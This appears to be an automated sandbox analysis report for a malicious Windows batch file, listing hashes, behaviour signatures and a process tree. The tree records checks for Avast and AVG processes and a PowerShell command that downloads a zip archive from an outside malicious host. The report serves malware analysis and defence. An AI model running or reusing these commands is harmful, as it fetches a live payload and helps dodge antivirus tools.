Analysis

  • max time kernel
    15s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-11-2024 04:04

General

  • Target

    8620fa4c62bd53e5b70aa10e6205f1ceffcd49bd7ca3b01cbe8f539273dd6695.bat

  • Size

    29KB

  • MD5

    af0c16e6a8877ea5a72d5d4a876e8302

  • SHA1

    bc78be8297b41156b56fb22f7a84e7a85a183f7a

  • SHA256

    8620fa4c62bd53e5b70aa10e6205f1ceffcd49bd7ca3b01cbe8f539273dd6695

  • SHA512

    73ec801912075022dba96acb14b0cf6397b09af73b8e2535bb8870783196fd87ccbcb3f1530151c5c384f05d707d0bc593de33e33a85cb25872648db1884f629

  • SSDEEP

    768:gTYcpQyuPmhDGEhtKC7/ZAmvh3MT2iabBp2KHrxWPylMhQYXTtlE:gTYcpQyuPmhDGEhtKC7BAmvtO2ip88Pk

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\8620fa4c62bd53e5b70aa10e6205f1ceffcd49bd7ca3b01cbe8f539273dd6695.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2848
    • C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq AvastUI.exe"
      2⤵
      • Enumerates processes with tasklist
      • Suspicious use of AdjustPrivilegeToken
      PID:1264
    • C:\Windows\system32\find.exe
      find /i "AvastUI.exe"
      2⤵
        PID:540
      • C:\Windows\system32\tasklist.exe
        tasklist /FI "IMAGENAME eq avgui.exe"
        2⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:1576
      • C:\Windows\system32\find.exe
        find /i "avgui.exe"
        2⤵
          PID:2096
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://goninvoicceme.shop:7070/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2408
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://goninvoicceme.shop:7070/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2812

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4HM19E03LGAWS6FSC571.temp

        Filesize

        7KB

        MD5

        5024d9a5830b7a3ed90266fc8e44408e

        SHA1

        b0bea51f91d448d8bb127a5e98651bfb4fb715b8

        SHA256

        e7051e846a424cf117874dfe8486159088627f078b112578521764b2ac52c9eb

        SHA512

        b1f5b618af0bfdc1e44c0f44000531540c927bc41e4fbfa37e1cf52c3e7187b4f81a7cbd282fec0a87fb878f9708b0eebbf09d3e4d03b02bc4ba31d77a2f6ac8

      • memory/2408-4-0x000007FEF5CEE000-0x000007FEF5CEF000-memory.dmp

        Filesize

        4KB

      • memory/2408-5-0x000000001B5B0000-0x000000001B892000-memory.dmp

        Filesize

        2.9MB

      • memory/2408-6-0x0000000002310000-0x0000000002318000-memory.dmp

        Filesize

        32KB

      • memory/2408-7-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

        Filesize

        9.6MB

      • memory/2408-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

        Filesize

        9.6MB

      • memory/2408-9-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

        Filesize

        9.6MB

      • memory/2408-10-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

        Filesize

        9.6MB

      • memory/2812-16-0x000000001B790000-0x000000001BA72000-memory.dmp

        Filesize

        2.9MB

      • memory/2812-17-0x0000000001D90000-0x0000000001D98000-memory.dmp

        Filesize

        32KB